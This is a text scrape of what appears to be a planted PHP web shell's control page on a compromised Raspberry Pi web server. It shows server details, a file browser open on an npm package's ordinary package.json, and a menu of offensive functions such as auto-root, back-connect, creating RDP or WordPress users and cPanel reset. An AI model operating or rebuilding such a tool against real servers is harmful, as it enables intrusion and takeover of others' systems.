Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
spdx-expression-parse /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
163
B
-rw-r--r--
index.js
114
B
-rw-r--r--
package.json
909
B
-rw-r--r--
parser.js
38.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "spdx-expression-parse", "description": "parse SPDX license expressions", "version": "1.0.4", "author": "Kyle E. Mitchell <kyle@kemitchell.com> (http://kemitchell.com)", "files": [ "AUTHORS", "index.js", "parser.js" ], "devDependencies": { "defence-cli": "^1.0.1", "jison": "^0.4.15", "replace-require-self": "^1.0.0", "spdx-exceptions": "^1.0.4", "spdx-license-ids": "^1.0.0", "standard": "^8.0.0" }, "keywords": [ "SPDX", "law", "legal", "license", "metadata", "package", "package.json", "standards" ], "license": "(MIT AND CC-BY-3.0)", "repository": "kemitchell/spdx-expression-parse.js", "scripts": { "lint": "standard", "prepublish": "node generate-parser.js > parser.js", "pretest": "npm run prepublish", "test": "defence -i javascript README.md | replace-require-self | node" } }
Close